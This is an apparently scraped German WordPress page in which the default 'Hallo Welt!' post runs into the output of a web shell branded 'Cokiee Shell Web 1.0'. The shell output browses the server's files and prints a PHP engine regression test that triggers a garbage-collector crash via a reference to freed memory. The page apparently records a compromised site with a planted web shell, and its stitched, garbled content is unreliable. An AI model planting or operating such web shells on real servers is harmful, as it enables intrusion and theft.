Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/gc_033.phpt |
--TEST-- GC 033: Crash in GC while run with phpspec --FILE-- <?php $a = new stdClass(); $a->a = array(); $a->a[0] = new Stdclass(); $a->a[0]->a = $a; $a->a[1] = &$a->a; /* remove the self-reference array out of roots */ gc_collect_cycles(); /* do unset */ unset($a); /* let's full the gc roots */ for ($i=0; $i<9999; $i++) { $b = range(0, 1); $b[0] = &$b; unset($b); } /* then $a will be freed, but $a->a[0] is not. reference to a freed $a */ var_dump(gc_collect_cycles()); ?> --EXPECT-- int(20001)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare